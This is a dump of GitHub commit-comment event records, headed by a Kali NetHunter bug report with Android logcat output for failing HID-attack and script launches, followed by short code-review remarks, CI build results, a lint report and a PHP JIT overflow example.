{"id":"4625020942","type":"CommitCommentEvent","actor":{"login":"thel3l"},"repo":{"name":"offensive-security/nethunter-app"},"payload":{"comment":{"id":19192714,"position":null,"line":null,"path":null,"commit_id":"6686ff82f32bcb36ea1791476df9544a03bba14b","created_at":"2016-09-27T15:34:21Z","updated_at":"2016-09-27T15:34:21Z","body":"@binkybear , here's the log that I captured from my PC. \r\n\r\n*On attempting to launch any HID attack* (using the 'Execute attack option'), it seems to fail silently:\r\n```\r\n\r\n09-27 20:55:27.278 8445-8445/? I/art: Late-enabling -Xcheck:jni\r\n09-27 20:55:27.298 8445-8452/? I/art: Debugger is no longer active\r\n09-27 20:55:27.321 8445-8445/? W/System: ClassLoader referenced unknown path: /data/app/com.offsec.nethunter-1/lib/arm\r\n09-27 20:55:27.327 8445-8445/? I/InstantRun: Instant Run Runtime started. Android package is com.offsec.nethunter, real application class is null.\r\n09-27 20:55:27.446 8445-8445/? W/System: ClassLoader referenced unknown path: /data/app/com.offsec.nethunter-1/lib/arm\r\n09-27 20:55:27.627 8445-8445/? W/art: Before Android 4.1, method android.graphics.PorterDuffColorFilter android.support.graphics.drawable.VectorDrawableCompat.updateTintFilter(android.graphics.PorterDuffColorFilter, android.content.res.ColorStateList, android.graphics.PorterDuff$Mode) would have incorrectly overridden the package-private method in android.graphics.drawable.Drawable\r\n09-27 20:55:27.651 8445-8445/? D/CHECK_FOR_ROOT: CONTRUCTING\r\n09-27 20:55:28.306 8445-8483/com.offsec.nethunter D/OpenGLRenderer: Use EGL_SWAP_BEHAVIOR_PRESERVED: true\r\n09-27 20:55:28.387 8445-8483/com.offsec.nethunter I/Adreno-EGL: <qeglDrvAPI_eglInitialize:379>: EGL 1.4 QUALCOMM build: Nondeterministic_AU_msm8974_LA.BF.1.1.3_RB1__release_AU (Ia6c73e7530)\r\n                                                                OpenGL ES Shader Compiler Version: E031.29.00.00\r\n                                                                Build Date: 12/04/15 Fri\r\n                                                                Local Branch: mybranch17080070\r\n                                                                Remote Branch: quic/LA.BF.1.1.3_rb1.5\r\n                                                                Local Patches: NONE\r\n                                                                Reconstruct Branch: NOTHING\r\n09-27 20:55:28.394 8445-8487/com.offsec.nethunter D/COPY_ASSETS_TAG: COPYING FILES....\r\n09-27 20:55:28.394 8445-8483/com.offsec.nethunter I/OpenGLRenderer: Initialized EGL, version 1.4\r\n09-27 20:55:31.706 8445-8487/com.offsec.nethunter D/COPY_ASSETS_TAG: Making /system writeable for symlink\r\n09-27 20:55:31.753 8445-8487/com.offsec.nethunter D/COPY_ASSETS_TAG: Making /system readonly for symlink\r\n09-27 20:55:32.863 8445-8445/com.offsec.nethunter D/Res_copyAssets:: All files copied.\r\n09-27 20:55:55.528 8445-8445/com.offsec.nethunter I/ListPopupWindow: Could not find method setEpicenterBounds(Rect) on PopupWindow. Oh well.\r\n09-27 20:55:55.550 8445-8445/com.offsec.nethunter W/art: Before Android 4.1, method int android.support.v7.widget.ListViewCompat.lookForSelectablePosition(int, boolean) would have incorrectly overridden the package-private method in android.widget.ListView\r\n09-27 20:55:58.778 8445-8483/com.offsec.nethunter V/RenderScript: 0x9cc3c000 Launching thread(s), CPUs 4\r\n09-27 20:55:59.093 8445-8483/com.offsec.nethunter D/OpenGLRenderer: endAllStagingAnimators on 0x9a406600 (MenuPopupWindow$MenuDropDownListView) with handle 0x9dfb14b0\r\n09-27 20:56:13.123 8445-8483/com.offsec.nethunter D/OpenGLRenderer: endAllStagingAnimators on 0x998da780 (MenuPopupWindow$MenuDropDownListView) with handle 0x9dfb13f0\r\n\r\n```\r\n\r\nand \r\n\r\n```09-27 21:00:47.016 12299-12299/com.offsec.nethunter I/ListPopupWindow: Could not find method setEpicenterBounds(Rect) on PopupWindow. Oh well.\r\n09-27 21:00:47.059 12299-12299/com.offsec.nethunter W/art: Before Android 4.1, method int android.support.v7.widget.ListViewCompat.lookForSelectablePosition(int, boolean) would have incorrectly overridden the package-private method in android.widget.ListView\r\n09-27 21:00:50.602 12299-12337/com.offsec.nethunter D/OpenGLRenderer: endAllStagingAnimators on 0x99f34680 (MenuPopupWindow$MenuDropDownListView) with handle 0xb483a430\r\n09-27 21:00:51.675 12299-12337/com.offsec.nethunter V/RenderScript: 0x98cb8000 Launching thread(s), CPUs 4\r\n```\r\n\r\nNote that this is for **all** HID attacks  - not just the new tab that I added. However, they still execute perfectly when I downgrade to the app version that was packaged into the flashable zip file that I used, initially.\r\n\r\n\r\n*On attempting to launch the any script from within the app* (nhterm logs):\r\n```\r\n09-27 21:03:44.188 800-800/com.offsec.nhterm D/Term: TermService started\r\n09-27 21:03:44.188 800-800/com.offsec.nhterm I/TermService: Activity called onBind()\r\n09-27 21:03:44.208 800-800/com.offsec.nhterm I/TermService: Activity binding to service\r\n09-27 21:03:44.208 800-800/com.offsec.nhterm D/RUN_SCRIPT_NH: CMD: echo -ne \"\\033]0;Updating Kali\\007\" && clear;apt-get update && apt-get upgrade\r\n09-27 21:03:44.208 800-800/com.offsec.nhterm D/initialCommand: echo -ne \"\\033]0;Updating Kali\\007\" && clear;apt-get update && apt-get upgrade\r\n09-27 21:03:44.208 800-800/com.offsec.nhterm D/MM createTermSession: /su/bin/su -c /system/bin/bootkalicmd: echo -ne \"\\033]0;Updating Kali\\007\" && clear;apt-get update && apt-get upgrade\r\n09-27 21:03:44.208 800-800/com.offsec.nhterm D/CS: shell: /su/bin/su -c /system/bin/bootkali\r\n09-27 21:03:44.208 800-800/com.offsec.nhterm D/CS parse:: /su/bin/su -c /system/bin/bootkali\r\n09-27 21:03:44.214 800-800/com.offsec.nhterm D/STS: ^^: /su/bin/su -c /system/bin/bootkali cmd: echo -ne \"\\033]0;Updating Kali\\007\" && clear;apt-get update && apt-get upgrade\r\n09-27 21:03:44.248 800-800/com.offsec.nhterm V/Term: onCreate\r\n09-27 21:03:44.300 800-800/com.offsec.nhterm I/Term: Bound to TermService\r\n09-27 21:03:44.300 800-800/com.offsec.nhterm I/TermService: Activity binding to service\r\n09-27 21:03:44.308 800-800/com.offsec.nhterm D/populateWindowList: in Not null\r\n09-27 21:03:44.308 800-800/com.offsec.nhterm D/onUpdate: 0\r\n09-27 21:03:44.308 800-800/com.offsec.nhterm D/onUpdate: 0\r\n09-27 21:03:44.308 800-800/com.offsec.nhterm D/populateWindowList: in mWinListAdapter = null\r\n09-27 21:03:44.308 800-800/com.offsec.nhterm D/populateWindowList: curLength  == null\r\n09-27 21:03:44.318 800-800/com.offsec.nhterm D/new getView: 0\r\n09-27 21:03:44.318 800-800/com.offsec.nhterm D/mPendingPathBroadcasts: Tamano = 1\r\n09-27 21:03:44.318 800-800/com.offsec.nhterm D/mPendingPathBroadcasts: Tamano = 1\r\n09-27 21:03:44.319 800-800/com.offsec.nhterm D/new getView: 0\r\n09-27 21:03:44.319 800-800/com.offsec.nhterm D/mPendingPathBroadcasts: Tamano = 1\r\n09-27 21:03:44.319 800-800/com.offsec.nhterm D/mPendingPathBroadcasts: Tamano = 1\r\n09-27 21:03:44.333 800-800/com.offsec.nhterm D/new getView: 0\r\n09-27 21:03:44.333 800-800/com.offsec.nhterm D/mPendingPathBroadcasts: Tamano = 1\r\n09-27 21:03:44.333 800-800/com.offsec.nhterm D/mPendingPathBroadcasts: Tamano = 1\r\n09-27 21:03:44.339 800-800/com.offsec.nhterm D/CS: InitialCmd: echo -ne \"\\033]0;Updating Kali\\007\" && clear;apt-get update && apt-get upgrade\r\n09-27 21:03:44.343 800-16081/com.offsec.nhterm I/Term: waiting for: 16058\r\n09-27 21:03:44.343 800-16081/com.offsec.nhterm I/Term: Subprocess exited: 1\r\n09-27 21:03:44.368 800-800/com.offsec.nhterm D/new getView: 0\r\n09-27 21:03:44.368 800-800/com.offsec.nhterm D/mPendingPathBroadcasts: Tamano = 1\r\n09-27 21:03:44.368 800-800/com.offsec.nhterm D/mPendingPathBroadcasts: Tamano = 1\r\n09-27 21:03:44.369 800-800/com.offsec.nhterm D/new getView: 0\r\n09-27 21:03:44.369 800-800/com.offsec.nhterm D/mPendingPathBroadcasts: Tamano = 1\r\n09-27 21:03:44.369 800-800/com.offsec.nhterm D/mPendingPathBroadcasts: Tamano = 1\r\n09-27 21:03:44.384 800-800/com.offsec.nhterm D/mWinListItemSelected: 0\r\n09-27 21:03:44.387 800-800/com.offsec.nhterm D/onUpdate: 0\r\n09-27 21:03:44.388 800-800/com.offsec.nhterm D/noning SI EXIT: ???\r\n09-27 21:03:44.388 800-800/com.offsec.nhterm D/noning FINISH: ???\r\n09-27 21:03:44.389 800-800/com.offsec.nhterm D/onupdateeeeee: tamano 0\r\n09-27 21:03:44.404 800-800/com.offsec.nhterm D/onUpdate: 0\r\n09-27 21:03:44.404 800-800/com.offsec.nhterm W/IInputConnectionWrapper: getSelectedText on inactive InputConnection\r\n09-27 21:03:44.417 800-800/com.offsec.nhterm W/IInputConnectionWrapper: requestCursorAnchorInfo on inactive InputConnection\r\n09-27 21:03:44.444 800-800/com.offsec.nhterm W/IInputConnectionWrapper: getTextBeforeCursor on inactive InputConnection\r\n09-27 21:03:44.456 800-800/com.offsec.nhterm W/IInputConnectionWrapper: getTextBeforeCursor on inactive InputConnection\r\n09-27 21:03:44.490 800-800/com.offsec.nhterm W/IInputConnectionWrapper: getTextBeforeCursor on inactive InputConnection\r\n09-27 21:03:44.491 800-800/com.offsec.nhterm W/IInputConnectionWrapper: getSelectedText on inactive InputConnection\r\n09-27 21:03:44.491 800-800/com.offsec.nhterm W/IInputConnectionWrapper: requestCursorAnchorInfo on inactive InputConnection\r\n09-27 21:03:44.491 800-800/com.offsec.nhterm W/IInputConnectionWrapper: getTextBeforeCursor on inactive InputConnection\r\n09-27 21:03:44.492 800-800/com.offsec.nhterm W/IInputConnectionWrapper: getTextBeforeCursor on inactive InputConnection\r\n09-27 21:03:44.493 800-800/com.offsec.nhterm W/IInputConnectionWrapper: getTextBeforeCursor on inactive InputConnection\r\n09-27 21:03:44.509 800-800/com.offsec.nhterm W/IInputConnectionWrapper: getTextBeforeCursor on inactive InputConnection\r\n09-27 21:03:44.510 800-800/com.offsec.nhterm W/IInputConnectionWrapper: getSelectedText on inactive InputConnection\r\n09-27 21:03:44.510 800-800/com.offsec.nhterm W/IInputConnectionWrapper: requestCursorAnchorInfo on inactive InputConnection\r\n09-27 21:03:44.510 800-800/com.offsec.nhterm W/IInputConnectionWrapper: getTextBeforeCursor on inactive InputConnection\r\n09-27 21:03:44.512 800-800/com.offsec.nhterm W/IInputConnectionWrapper: getTextBeforeCursor on inactive InputConnection\r\n09-27 21:03:44.640 800-800/com.offsec.nhterm W/MessageQueue: Handler (com.offsec.nhterm.emulatorview.TermSession$3$1) {4e981f0} sending message to a Handler on a dead thread\r\n                                                             java.lang.IllegalStateException: Handler (com.offsec.nhterm.emulatorview.TermSession$3$1) {4e981f0} sending message to a Handler on a dead thread\r\n                                                                 at android.os.MessageQueue.enqueueMessage(MessageQueue.java:543)\r\n                                                                 at android.os.Handler.enqueueMessage(Handler.java:631)\r\n                                                                 at android.os.Handler.sendMessageAtTime(Handler.java:600)\r\n                                                                 at android.os.Handler.sendMessageDelayed(Handler.java:570)\r\n                                                                 at android.os.Handler.sendEmptyMessageDelayed(Handler.java:534)\r\n                                                                 at android.os.Handler.sendEmptyMessage(Handler.java:519)\r\n                                                                 at com.offsec.nhterm.emulatorview.TermSession.notifyNewOutput(TermSession.java:342)\r\n                                                                 at com.offsec.nhterm.emulatorview.TermSession.write(TermSession.java:276)\r\n                                                                 at com.offsec.nhterm.emulatorview.TermSession.write(TermSession.java:296)\r\n                                                                 at com.offsec.nhterm.ShellTermSession$3.run(ShellTermSession.java:134)\r\n                                                                 at android.os.Handler.handleCallback(Handler.java:739)\r\n                                                                 at android.os.Handler.dispatchMessage(Handler.java:95)\r\n                                                                 at android.os.Looper.loop(Looper.java:148)\r\n                                                                 at android.app.ActivityThread.main(ActivityThread.java:5461)\r\n                                                                 at java.lang.reflect.Method.invoke(Native Method)\r\n                                                                 at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:726)\r\n                                                                 at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:616)\r\n```\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-27T15:34:21Z"}
{"id":"4625025470","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19192716,"position":null,"line":null,"path":null,"commit_id":"1fbaea0b41eea06ea7e3370278c5064573d2a63f","created_at":"2016-09-27T15:34:47Z","updated_at":"2016-09-27T15:34:47Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1181](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14403&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 260, ignored: 3 Build time: 00:09:55"}},"created_at":"2016-09-27T15:34:47Z"}
{"id":"4625026524","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"serggv91/sbt"},"payload":{"comment":{"id":19192717,"position":52,"line":52,"path":"src/ru/sberbank/school/task5/TerminalServer.java","commit_id":"195913784f7c36677a1442f036a68a90e9953568","created_at":"2016-09-27T15:34:52Z","updated_at":"2016-09-27T15:34:52Z","body":"Баланс - это число"}},"created_at":"2016-09-27T15:34:52Z"}
{"id":"4625038630","type":"CommitCommentEvent","actor":{"login":"dannytranlx"},"repo":{"name":"dciets/dciets.github.io"},"payload":{"comment":{"id":19192730,"position":null,"line":null,"path":null,"commit_id":"63c1618e286ab4cdf2a91b0317ce665d82befeaa","created_at":"2016-09-27T15:36:13Z","updated_at":"2016-09-27T15:36:13Z","body":"Pas mal cute 👍 "}},"created_at":"2016-09-27T15:36:13Z"}
{"id":"4625038660","type":"CommitCommentEvent","actor":{"login":"ftoledo"},"repo":{"name":"HuayraLinux/huayra-cam"},"payload":{"comment":{"id":19192731,"position":null,"line":null,"path":null,"commit_id":"19fca212aab5295c8bee4cd109e8de80d26490a0","created_at":"2016-09-27T15:36:13Z","updated_at":"2016-09-27T15:36:13Z","body":"Excelente!"}},"created_at":"2016-09-27T15:36:13Z"}
{"id":"4625040072","type":"CommitCommentEvent","actor":{"login":"amihaiemil"},"repo":{"name":"amihaiemil/oink"},"payload":{"comment":{"id":19192733,"position":59,"line":59,"path":"service/src/main/java/org/pig/oink/rest/IOExceptionMapper.java","commit_id":"f1aaadbaf5b023debd8809034c58cf6226fe3fdd","created_at":"2016-09-27T15:36:23Z","updated_at":"2016-09-27T15:36:23Z","body":"FileNotFoundException extends IOException so it will enter here if some fnfe is thrown. Like before, if it's a fnfe, the response status will be 404 NOT FOUND"}},"created_at":"2016-09-27T15:36:23Z"}
{"id":"4625041407","type":"CommitCommentEvent","actor":{"login":"nunziotocci"},"repo":{"name":"workflowproducts/postage"},"payload":{"comment":{"id":19192737,"position":null,"line":null,"path":null,"commit_id":"26a29feee5efacc4cc5f63f98be74514a2ff55d9","created_at":"2016-09-27T15:36:34Z","updated_at":"2016-09-27T15:36:34Z","body":"this closes #7"}},"created_at":"2016-09-27T15:36:34Z"}
{"id":"4625048438","type":"CommitCommentEvent","actor":{"login":"swilly0906"},"repo":{"name":"swilly0906/test--wang-repo"},"payload":{"comment":{"id":19192749,"position":null,"line":null,"path":null,"commit_id":"fdbcf7a982b5338b99c07b1c78a9eab1e2f9adaf","created_at":"2016-09-27T15:37:27Z","updated_at":"2016-09-27T15:37:27Z","body":" Hey Hey "}},"created_at":"2016-09-27T15:37:27Z"}
{"id":"4625049825","type":"CommitCommentEvent","actor":{"login":"swilly0906"},"repo":{"name":"swilly0906/test--wang-repo"},"payload":{"comment":{"id":19192751,"position":null,"line":null,"path":null,"commit_id":"fdbcf7a982b5338b99c07b1c78a9eab1e2f9adaf","created_at":"2016-09-27T15:37:39Z","updated_at":"2016-09-27T15:37:39Z","body":"test test"}},"created_at":"2016-09-27T15:37:39Z"}
{"id":"4625057915","type":"CommitCommentEvent","actor":{"login":"amihaiemil"},"repo":{"name":"amihaiemil/oink"},"payload":{"comment":{"id":19192770,"position":8,"line":27,"path":"pom.xml","commit_id":"beff11e5308ec3a29e12970942eb8056e08746bf","created_at":"2016-09-27T15:38:49Z","updated_at":"2016-09-27T15:38:49Z","body":"I added this because in some IDEs, like eclipse, the default compiler level is 1.5 and then the compiler complains because methods implemented from an interface are annotated with ``Override`` and that is from Java 6 onwards"}},"created_at":"2016-09-27T15:38:49Z"}
{"id":"4625064656","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":19192790,"position":111,"line":138,"path":"HelloWorld/Miscellaneous/MemoryModel2.cs","commit_id":"807f008e39f64d052aa59524fe846905bf91a9f5","created_at":"2016-09-27T15:39:49Z","updated_at":"2016-09-27T15:39:49Z","body":"Рекомедуется всегда с циклами и условными операторами использовать блок коман с фигурными скобками, даже если команда всего одна. в качестве исключения можно взять только конструкции \"if(...) return ...;\", которые записываются в одну строчку. "}},"created_at":"2016-09-27T15:39:49Z"}
{"id":"4625071914","type":"CommitCommentEvent","actor":{"login":"remitamine"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19192803,"position":null,"line":null,"path":null,"commit_id":"27e99078d337cdc77a5a7228998d3b2fe722e7cb","created_at":"2016-09-27T15:40:49Z","updated_at":"2016-09-27T15:40:49Z","body":"http://doc.aljazeera.net/%D8%A7%D9%84%D8%A8%D8%AB-%D8%A7%D9%84%D8%AD%D9%8A"}},"created_at":"2016-09-27T15:40:49Z"}
{"id":"4625073378","type":"CommitCommentEvent","actor":{"login":"changtengfei"},"repo":{"name":"openwsn-berkeley/openwsn-fw"},"payload":{"comment":{"id":19192806,"position":null,"line":null,"path":null,"commit_id":"6146abe57e7ebdb8bb3ef60d69c754dfdf3d02a8","created_at":"2016-09-27T15:41:03Z","updated_at":"2016-09-27T15:41:03Z","body":"@OnsetJon if the busySending is TRUE, it means there is an packet in the queue not sent yet. it's not suppose to send. Either it's sent finally or 3 re-tries on transmission, the senddone will be called and clear those the busysending flag.\r\n"}},"created_at":"2016-09-27T15:41:03Z"}
{"id":"4625074608","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19192810,"position":5,"line":90,"path":"contrib/windows/msys_build.sh","commit_id":"c8e090ca778f5f99d7b1dba56c04c2de56b4782b","created_at":"2016-09-27T15:41:13Z","updated_at":"2016-09-27T15:41:13Z","body":"`make binary-dist` should download one, and yes either copy it to somewhere already on path or append"}},"created_at":"2016-09-27T15:41:13Z"}
{"id":"4625075835","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19192811,"position":null,"line":null,"path":null,"commit_id":"76e722c06e47df2185abdba75f3cd53297a90b7e","created_at":"2016-09-27T15:41:24Z","updated_at":"2016-09-27T15:41:24Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1182](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14408&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 227, ignored: 3 Build time: 00:09:37\n### Failed tests\n```\norg.genivi.sota.core.DeviceUpdatesResourceSpec.GET to download a file returns 3xx if the package URL is an s3 URI: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-27T15:41:24Z"}
{"id":"4625087467","type":"CommitCommentEvent","actor":{"login":"tve"},"repo":{"name":"maruel/dlibox"},"payload":{"comment":{"id":19192830,"position":4,"line":154,"path":"go/pio/protocols/gpio/gpio.go","commit_id":"54e02428e41c03068368dcb5ccd36a3f91f522f7","created_at":"2016-09-27T15:43:07Z","updated_at":"2016-09-27T15:43:07Z","body":"out of curiosity, what was the use-case that prompted this change?"}},"created_at":"2016-09-27T15:43:07Z"}
{"id":"4625087934","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"AlexeyDomnin/SberRepo"},"payload":{"comment":{"id":19192832,"position":13,"line":13,"path":"src/ru/sberbank/javaschool/hometask5/TerminalServerImpl.java","commit_id":"ab4d4888519cedb3298e24119e34bc1ed32422ce","created_at":"2016-09-27T15:43:11Z","updated_at":"2016-09-27T15:43:11Z","body":"Баланс может быть с плавающей запятой"}},"created_at":"2016-09-27T15:43:11Z"}
{"id":"4625089014","type":"CommitCommentEvent","actor":{"login":"alejhg89"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19192834,"position":null,"line":null,"path":null,"commit_id":"a45b74c250bc1b320ee82269655ec491eb938dd8","created_at":"2016-09-27T15:43:21Z","updated_at":"2016-09-27T15:43:21Z","body":"excellent work people, by far the most mop... greetings from Cuba"}},"created_at":"2016-09-27T15:43:21Z"}
{"id":"4625089553","type":"CommitCommentEvent","actor":{"login":"kam187"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19192835,"position":null,"line":null,"path":null,"commit_id":"2b022d9a04c2856025e7f9f375bbaaadd38f46d2","created_at":"2016-09-27T15:43:26Z","updated_at":"2016-09-27T15:43:26Z","body":"I'll update the client.  I installed it 'ages' ago :)"}},"created_at":"2016-09-27T15:43:26Z"}
{"id":"4625092821","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.namedfile"},"payload":{"comment":{"id":19192844,"position":null,"line":null,"path":null,"commit_id":"a065e173ad8b725403e5ee3a31904ea47f614494","created_at":"2016-09-27T15:43:55Z","updated_at":"2016-09-27T15:43:55Z","body":"@didrix Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.namedfile/57/violations\n```\nplone/namedfile/file.py:291:1: C901 'getImageInfo' is too complex (15)\nplone/namedfile/scaling.py:0:1: I001 isort found changes, run it on the file\nplone/namedfile/scaling.py:198:1: C901 'DefaultImageScalingFactory.__call__' is too complex (13)\nplone/namedfile/scaling.py:380:1: C901 'ImageScaling.scale' is too complex (12)\nplone/namedfile/scaling.py:422:80: E501 line too long (80 > 79 characters)\nplone/namedfile/scaling.py:423:5: E125 continuation line with same indent as next logical line\nplone/namedfile/scaling.py:462:15: E127 continuation line over-indented for visual indent\nplone/namedfile/scaling.py:463:15: E127 continuation line over-indented for visual indent\nplone/namedfile/scaling.py:464:15: E127 continuation line over-indented for visual indent\nplone/namedfile/scaling.py:466:41: Q000 Remove bad quotes.\nplone/namedfile/utils.py:0:1: I001 isort found changes, run it on the file\nplone/namedfile/utils.py:87:61: Q000 Remove bad quotes.\nplone/namedfile/utils.py:87:80: E501 line too long (81 > 79 characters)\nplone/namedfile/utils.py:95:9: E122 continuation line missing indentation or outdented\nplone/namedfile/utils.py:99:9: E122 continuation line missing indentation or outdented\nplone/namedfile/tests/test_scaling.py:138:32: S001 found %s formatter\nplone/namedfile/tests/test_scaling.py:140:80: E501 line too long (83 > 79 characters)\nplone/namedfile/tests/test_scaling.py:263:13: E128 continuation line under-indented for visual indent\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-27T15:43:55Z"}
{"id":"4625097635","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"AlexeyDomnin/SberRepo"},"payload":{"comment":{"id":19192854,"position":60,"line":60,"path":"src/ru/sberbank/javaschool/hometask5/TerminalServerImpl.java","commit_id":"ab4d4888519cedb3298e24119e34bc1ed32422ce","created_at":"2016-09-27T15:44:40Z","updated_at":"2016-09-27T15:44:40Z","body":"Дублирование кода проверки. Считается самым большим злом из всех возможных."}},"created_at":"2016-09-27T15:44:40Z"}
{"id":"4625100259","type":"CommitCommentEvent","actor":{"login":"MaximeSchneberger"},"repo":{"name":"essert/depot_tpgit3"},"payload":{"comment":{"id":19192861,"position":null,"line":null,"path":null,"commit_id":"81c0c1e8e72366b92eba26a0ac2495f446cf852e","created_at":"2016-09-27T15:45:04Z","updated_at":"2016-09-27T15:45:04Z","body":"BG c'te citation je dis"}},"created_at":"2016-09-27T15:45:04Z"}
{"id":"4625104562","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope-iowait"},"payload":{"comment":{"id":19192867,"position":6,"line":4,"path":"README.md","commit_id":"d0351289d787ef32a5cb0b5c37692265ed994739","created_at":"2016-09-27T15:45:43Z","updated_at":"2016-09-27T15:45:43Z","body":"The Scope IOWait *plugin* is a ..."}},"created_at":"2016-09-27T15:45:43Z"}
{"id":"4625104643","type":"CommitCommentEvent","actor":{"login":"yuyichao"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19192868,"position":5,"line":90,"path":"contrib/windows/msys_build.sh","commit_id":"c8e090ca778f5f99d7b1dba56c04c2de56b4782b","created_at":"2016-09-27T15:45:44Z","updated_at":"2016-09-27T15:45:44Z","body":"ok."}},"created_at":"2016-09-27T15:45:44Z"}
{"id":"4625106459","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19192877,"position":null,"line":null,"path":null,"commit_id":"1e5f80c0dc73eb3fcff156f2d1458f21ec00c377","created_at":"2016-09-27T15:46:01Z","updated_at":"2016-09-27T15:46:01Z","body":"Hi,\r\n\r\nI don't have a look here (i don't look at JsonOutput class), but in firefox : if you don't add `'Content-Type: application/json'` to the header : json is shown like a text, if you add this : you have some tools \r\n![capture du 2016-09-27 17-44-54](https://cloud.githubusercontent.com/assets/1439428/18881025/2e6f093a-84da-11e6-9fe1-c466ab3c23b6.png)\r\n\r\nDon't know for chromium, but for debug it's really more easy :)\r\n"}},"created_at":"2016-09-27T15:46:01Z"}
{"id":"4625109102","type":"CommitCommentEvent","actor":{"login":"nikic"},"repo":{"name":"zendtech/php-src"},"payload":{"comment":{"id":19192884,"position":52,"line":659,"path":"ext/opcache/jit/zend_jit.c","commit_id":"5f025e330bb2e2fe3363ba860a882ed1f0258e6b","created_at":"2016-09-27T15:46:24Z","updated_at":"2016-09-27T15:46:24Z","body":"Hm, I think I see what you mean, but these checks do not really look correct for me. For example\r\n\r\n```php\r\n<?php\r\nfunction test($n) {\r\n    if ($n > 2) {\r\n        $m = -1;\r\n        $x = $n - $m;\r\n        var_dump($x);\r\n    }\r\n}\r\ntest(PHP_INT_MAX);\r\n```\r\n\r\nThis produces `float(9.2233720368548E+18)` normally but `int(-9223372036854775808)` with JIT."}},"created_at":"2016-09-27T15:46:24Z"}
{"id":"4625110113","type":"CommitCommentEvent","actor":{"login":"Fallstar"},"repo":{"name":"flyingrub/scdl"},"payload":{"comment":{"id":19192886,"position":null,"line":null,"path":null,"commit_id":"e862d2b2e02200002d7fb1ca6e872ae4bb9ef808","created_at":"2016-09-27T15:46:33Z","updated_at":"2016-09-27T15:46:33Z","body":"Nice."}},"created_at":"2016-09-27T15:46:33Z"}
{"id":"4625113154","type":"CommitCommentEvent","actor":{"login":"href"},"repo":{"name":"morepath/morepath"},"payload":{"comment":{"id":19192892,"position":null,"line":null,"path":null,"commit_id":"4923f18fc917ba177fbf8e55226f1c8297522e0e","created_at":"2016-09-27T15:47:00Z","updated_at":"2016-09-27T15:47:00Z","body":"> @href You first moved from pytest-cov to coverage in more.itsdangerous/ fd47bfc. \r\n> What is your reason?\r\n\r\nProbably because I use that everywhere. I tend to keep my dev environments homogenous. But I don't remember why particularly."}},"created_at":"2016-09-27T15:47:00Z"}
{"id":"4625115145","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"TatyanaLomova/JavaSchool"},"payload":{"comment":{"id":19192897,"position":65,"line":65,"path":"src/lesson_05/Terminal/src/Term/Main.java","commit_id":"b5b55071a4b83404c5859327ae1bffc9e3e0a0d4","created_at":"2016-09-27T15:47:17Z","updated_at":"2016-09-27T15:47:17Z","body":"Каждый case лучше оформить в виде отдельного метода, который обрабатывает именно этот случай."}},"created_at":"2016-09-27T15:47:17Z"}
{"id":"4625115515","type":"CommitCommentEvent","actor":{"login":"songjinlin123"},"repo":{"name":"songjinlin123/test"},"payload":{"comment":{"id":19192901,"position":2,"line":2,"path":"README.md","commit_id":"acaa533588f8c2924e8fc8d178e136fc899ebcd3","created_at":"2016-09-27T15:47:21Z","updated_at":"2016-09-27T15:47:21Z","body":"我的项目2"}},"created_at":"2016-09-27T15:47:21Z"}
{"id":"4625120312","type":"CommitCommentEvent","actor":{"login":"eessex"},"repo":{"name":"artsy/force"},"payload":{"comment":{"id":19192915,"position":5,"line":22,"path":"components/email/client/gallery_insights.coffee","commit_id":"474d289470d0c80ac196b358d4283a7d2f0fc277","created_at":"2016-09-27T15:48:03Z","updated_at":"2016-09-27T15:48:03Z","body":"@kanaabe,  I'm seeing an error from this line -- (ref.get is not a function). Using \r\n`sd.ARTICLE.section_ids.includes sd.GALLERY_INSIGHTS_SECTION_ID` seems to fix that, but gallery insights isn't being seen in a few places. Some of this overlaps wth the A/B banner logic, do you have a second to look at it together?"}},"created_at":"2016-09-27T15:48:03Z"}
{"id":"4625123830","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"TatyanaLomova/JavaSchool"},"payload":{"comment":{"id":19192929,"position":67,"line":67,"path":"src/lesson_05/Terminal/src/Term/Main.java","commit_id":"b5b55071a4b83404c5859327ae1bffc9e3e0a0d4","created_at":"2016-09-27T15:48:35Z","updated_at":"2016-09-27T15:48:35Z","body":"System.exit лучше никогда не использовать. Единственный вариант, если требуется конкретный код ошибки вернуть."}},"created_at":"2016-09-27T15:48:35Z"}
